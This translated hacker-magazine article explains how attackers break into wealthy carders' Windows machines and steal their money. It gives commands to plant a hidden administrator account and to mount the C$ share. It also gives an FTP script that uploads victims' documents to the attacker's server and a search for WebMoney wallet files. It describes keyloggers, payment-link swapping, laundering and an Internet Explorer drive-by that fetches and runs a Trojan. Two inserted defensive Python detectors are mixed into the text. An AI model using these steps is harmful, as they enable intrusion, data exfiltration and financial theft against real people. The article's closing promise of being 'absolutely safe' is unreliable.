How do hackers rip off the rich?

Teacher

Hello! Everyone earns a living, and in different ways. Some people choose to get rich in the virtual world, and those earnings are not always honest. A person takes risks, conducts important banking operations, sells credit cards, buys various things... and at some point loses everything. Through his own carelessness he is robbed blind by hacker Vasya from Mukhosransk. Why does this happen, and how does the hacker manage to attack seemingly well-protected carders? Let's try to figure it out.

Let's tame the system!
There are many ways to steal valuable information and a carder's savings. But it is worth noting that here the main thing is not quantity but quality, that is, the successful application of these methods.

So, it's time to tell you how a hacker can steal data from a victim. First, there is hacking the wealthy dupe's computer. Here it is a matter of luck; nothing can be said for sure. If the person is careless and does not read security bulletins, the hacker's chances increase dramatically. Otherwise, let alone with a firewall installed on the machine, this method is not suitable.

How do they break into user workstations? There are also different ways. Let's focus on the buggy WinNT. Have you always thought that if Windows carries the NT prefix, it is one hundred percent protected? I am going to disappoint you. Very dangerous bugs have been found in these platforms.

RPC epidemic
If you have not heard about the RPC vulnerability, you are slow on the uptake. This bug was trumpeted by every security portal, and many exploits were released, including for Windows (a paradise for script kiddies). How can a hacker make money from a naive bourgeois who probably does not even know that a patch for the RPC bug exists? Very simply. It is enough to gain access to his system and type a number of console commands. After that, all the important documents are in the attacker's hands.

I'm not going to teach you how to exploit the vulnerability. That has been covered by various hacker portals, as well as by Hacker #9. I will just draw your attention to some commands that may be useful to an attacker who has gained rights on the victim's system.

To avoid running a noisy exploit every time (which, by the way, can kill the RPC service and bring the system down), an administrator account can be created. Such an account can then be used for administrative shares such as C$, D$ and others. This is very easy to do. Just type the following lines:

net user admin nimda /add (adds a new user admin with the password nimda; you can substitute your own parameters)
net localgroup Administrators admin /add (adds the user to the Administrators group)
If the platform's localization is not English, the group name must be entered in the local language. To find it, the hacker types "net localgroup" and learns the group's actual name.

If everything was done correctly (the net command will definitely inform the hacker of the result), the attacker can connect to the machine from his own computer. The command "net use z: \\IP-ADDRESS\C$" does this. But he will never do it, for one simple reason: the machine keeps logs, and his IP address will definitely be recorded. There is a way out, though: the hacker connects not from his own machine, but from his favorite carded shell.

smbclient //IP-ADDRESS/C$ -U admin

This command is for Linux. After prompting for a password, the hacker gets into the C$ system share (to perform such actions, the hacker installs the samba package on his machine beforehand).
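From the defender's side, the account-creation and admin-share steps described above leave a trail in the Windows Security log. The following is an added example, not from the original post, that correlates constructed sample events (IDs 4720, 4732 and 5140 are the modern Security log IDs; NT-era systems numbered them differently) to flag a freshly created account that was promoted to Administrators and then used against C$:

```python
"""Correlate Security-log events for the 'create admin, use C$' pattern.

Added example, not from the original post. Event IDs: 4720 = user account
created, 4732 = member added to a security-enabled local group, 5140 = network
share accessed. All sample records below are constructed, not real logs."""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"        # well-known SID of BUILTIN\Administrators
ADMIN_SHARES = {"C$", "D$", "ADMIN$"}      # hidden administrative shares

# Constructed sample events: (ISO timestamp, event id, selected event fields)
SAMPLE_EVENTS = [
    ("2004-03-01T22:10:03", 4720, {"TargetUserName": "admin", "SubjectUserName": "SYSTEM"}),
    ("2004-03-01T22:10:09", 4732, {"MemberName": "WKS\\admin", "TargetSid": ADMINISTRATORS_SID}),
    ("2004-03-01T22:14:41", 5140, {"SubjectUserName": "admin", "ShareName": "\\\\*\\C$",
                                   "IpAddress": "203.0.113.7"}),
    ("2004-03-02T09:00:00", 4720, {"TargetUserName": "jsmith", "SubjectUserName": "helpdesk"}),
    ("2004-03-02T09:30:00", 4732, {"MemberName": "WKS\\jsmith", "TargetSid": "S-1-5-32-545"}),
]

def find_rogue_admins(events, window=timedelta(minutes=10)):
    """Return one alert per account that was created and added to Administrators
    within `window`, with any later admin-share access by that account attached."""
    created_at = {}
    alerts = []
    for ts, event_id, fields in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        if event_id == 4720:
            created_at[fields["TargetUserName"].lower()] = when
        elif event_id == 4732 and fields.get("TargetSid") == ADMINISTRATORS_SID:
            user = fields["MemberName"].split("\\")[-1].lower()   # strip DOMAIN\ prefix
            born = created_at.get(user)
            if born is not None and when - born <= window:
                alerts.append({"user": user, "created": born, "promoted": when, "shares": []})
        elif event_id == 5140:
            user = fields.get("SubjectUserName", "").lower()
            share = fields.get("ShareName", "").rsplit("\\", 1)[-1]   # '\\*\C$' -> 'C$'
            if share in ADMIN_SHARES:
                for alert in alerts:
                    if alert["user"] == user:
                        alert["shares"].append((when, share, fields.get("IpAddress")))
    return alerts

if __name__ == "__main__":
    for alert in find_rogue_admins(SAMPLE_EVENTS):
        print(f"ALERT: {alert['user']} created {alert['created']}, admin by {alert['promoted']}, "
              f"shares: {alert['shares']}")
```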

But sometimes just accessing directories is not enough. For example, when you need to monitor the user or install a keylogger on the machine (as well as view the process list, kill a process, and so on). In that case the hacker either plants an additional backdoor or runs the exploit every time.

He who seeks will always find
There is nothing tricky about finding information. If the hacker is impatient (and there are not many of them), he simply rummages through folders and downloads files with suspicious names (such as 1111.doc or paroli.doc). Text files can be read on the spot with the "type file" command. Many guides on hacking Windows insist on an account on some TFTP server. However, the operation can be performed with the ordinary ftp command. A pre-written script consists of simple commands passed to ftp. It can look, for example, like this:

Example of an FTP script:

user vasya vasya123
type binary
put document.doc /xakep/document.doc
quit

After the script is written (the commands are written to a file one by one using echo and output redirection), it is passed to the console ftp utility with the -s:file_name parameter. Note that authentication is performed by the script's first command, so the -n option, which suppresses auto-login, is added to the command line.

It should be noted that Windows has no counterpart to the Linux find command for locating files. However, that does not mean a file cannot be found from the console. The hacker's quarry is WebMoney wallets, which have the kwm and pwm extensions. They can be found with the following command:

dir /S /B c:\ | findstr /I "\.[kp]wm$"

This recursively lists everything on drive C:\ and then filters the output with findstr, keeping only the lines that end in .kwm or .pwm.

WebMoney: a hacker's joy
After the WebMoney wallets are downloaded, you need to learn the account ID (the client shows it) and the login password. The WebMoney password cannot be changed and is set only once (like the PIN code of a credit card), so it is quite possible that the user wrote it down in a file so as not to forget it. With a lucky combination of circumstances, the hacker pulls out this file along with the wallets and takes full possession of the victim's account. Attention! This is very dangerous, because the money transfer system keeps a history of all operations performed. I will say from experience that hackers have their own people who launder the money on the account, taking a certain percentage of the sum for their services.

There are other ways to obtain the password. For example, the hacker has managed to learn several passwords that the victim uses on the Net. He tries all of them, and maybe one will be correct. When there is no other way, a suitable keylogger can be found that sends the keystroke log to the attacker's e-mail address. Once it is running on the computer, all that remains is to wait until the user starts the WebMoney client. There is a way to speed this up: send the victim a message saying that the wallet has been topped up with a certain amount. Then he will definitely launch the client.

In general, there is one more method of obtaining a WM wallet. It is used against rich but dim-witted individuals who have recently but successfully mastered card fraud. A program is written, something like an "Internet cheater", except that it does not cheat the Internet but steals WebMoney wallets. Implementing it is a trifle; the problem is different: selling the program to the victim. A good hacker with extensive social engineering experience can do that.

The source code of this small program can be found in the sidebar. The full source code of the project is available on Yandex.Disk.

Besides the WebMoney service itself, there is the Merchant service, which is needed for online transfers of money from one WM wallet to another. The service is usually used by various projects, such as online stores. If a hacker breaks into such a resource, he simply replaces the link and parameters in the script's source code with those of his own WebMoney wallet. The client then sends money to the attacker's account. Undoubtedly, this will soon be noticed, but the cracker will have had time to enrich himself.

Holes in the donkey (Internet Explorer)
The RPC vulnerability is not the only bug in Windows. Let's look at another example: an error in processing the <OBJECT> tag that allows arbitrary code to be executed on the client's machine. By exploiting such a vulnerability, a hacker does not need to deliver the Trojan to the victim by hand, and can even record the victim's IP address in a log, which he later checks to see whether the backdoor took hold.

To write the exploit, it is enough to create the following HTML document:

<object data="/object.html">A big shalom to everyone</object>

In object.html, put a script, for example in Visual Basic. It downloads the Trojan from the specified address and then launches it. If you like, you can dream up writing the backdoor into the registry (unless, of course, it already implements such a function), but that is exclusively the intruder's problem.

To write the visitor's IP address to a log file, a simple Perl script is needed. For example, this one:

#!/usr/bin/perl
print "Content-type: text/html\n\n";
$ip = $ENV{REMOTE_ADDR};
open(LOG, ">>ipz.log");
print LOG "$ip\n";
close(LOG);

The main page redirects to this script, or an SSI directive is used, for example the following:

<!--#exec cgi="/path/to/iplog.cgi"-->

Keep in mind that for SSI inserts to be processed, the file must have the shtml extension. As for the file being written to (ipz.log), it must have permissions 666.

The idea of this method is to deliver malicious programs to the victim's computer using holes in the operating system. A regularly updated list of vulnerabilities can be found on any security portal.

But what about Linux?
As for Linux, all the methods of attacking this seemingly impregnable system were described in this issue's article "Find and fuck!". On this system one can find, perhaps, only credit cards and files storing passwords, as well as accounts for various resources.

Data sniffing is an effective way to steal information. A sniffer is a program that intercepts all traffic on certain interfaces and selects the information specified in its configuration. There are quite a few programs that intercept all traffic and write it to logs (filtering then remains the hacker's problem). In general, sniffers are easy to configure and run unnoticed on a server.

The principle of all sniffers is based, as I said, on intercepting data from a specific network interface. For this, promiscuous mode is set, in which the network card accepts all packets, even those addressed to other machines. You can probably guess that a sniffer can only be used successfully on computers that act as routers. If that is the case, the hacker intercepts all traffic on the local network.

Lately, sniffers are written by very competent people. No utilities, such as ps, ifconfig, IDS and others, are able to detect them.
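The promiscuous flag is kernel state, so a defender can check it without trusting a possibly replaced ifconfig binary. The following is an added example, not from the original post, that reads each interface's flags word from /sys/class/net (IFF_PROMISC is bit 0x100 in linux/if.h) and reports interfaces with it set; the SAMPLE_FLAGS values are constructed for the offline run, and a kernel-level rootkit could still hide the flag.

```python
"""Check network interfaces for promiscuous mode, the state a sniffer needs.

Added example, not from the original post. Reads the kernel's interface flags
from sysfs instead of parsing ifconfig output, which a trojaned binary could
falsify (a kernel rootkit could still lie). IFF_PROMISC = 0x100 in <linux/if.h>."""
import os

IFF_PROMISC = 0x100            # "receive every packet" flag bit from linux/if.h
SYSFS_NET = "/sys/class/net"   # one directory per interface, each with a 'flags' file

def promiscuous_interfaces(flags_by_iface):
    """Return the interfaces whose flags word has IFF_PROMISC set.
    `flags_by_iface` maps interface name -> flags text as sysfs prints it (e.g. '0x1103')."""
    found = []
    for iface, raw in sorted(flags_by_iface.items()):
        try:
            flags = int(raw.strip(), 16)
        except ValueError:
            continue          # unreadable flags entry: skip it rather than crash the scan
        if flags & IFF_PROMISC:
            found.append(iface)
    return found

def read_sysfs_flags(root=SYSFS_NET):
    """Read <root>/<iface>/flags for every interface; returns {} when sysfs is absent."""
    result = {}
    if not os.path.isdir(root):
        return result
    for iface in os.listdir(root):
        try:
            with open(os.path.join(root, iface, "flags")) as fh:
                result[iface] = fh.read()
        except OSError:
            pass              # virtual entries without a flags file, or no permission
    return result

# Constructed sample (not read from a real host): eth0 has 0x100 set, lo and wlan0 do not.
SAMPLE_FLAGS = {"eth0": "0x1103\n", "lo": "0x9\n", "wlan0": "0x1003\n"}

if __name__ == "__main__":
    live = read_sysfs_flags()
    for iface in promiscuous_interfaces(live or SAMPLE_FLAGS):
        print(f"{iface}: promiscuous mode set (possible sniffer)")
```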

Another interesting method is cracking (brute-forcing) passwords for a specific service. I have heard of such private projects as an HTTPS account brute-forcer. So it is quite possible to crack a businessman's account on any secure service.

I am not even talking about brute-forcing passwords on insecure services that can be sniffed. There are plenty of such brute-forcers on the Internet, and most of them support multithreading. Of course, the days when root/root or admin/admin pairs were used as accounts have passed, but dictionary passwords are very common. So guessing a password becomes quite realistic.

So, to sum up. Account theft is a hot topic. Everyone who can be bothered steals, and whatever lies unguarded gets stolen. Therefore, if you are a successful network businessman, I recommend protecting your system with the necessary patches and a properly configured firewall. Only then will you be absolutely safe.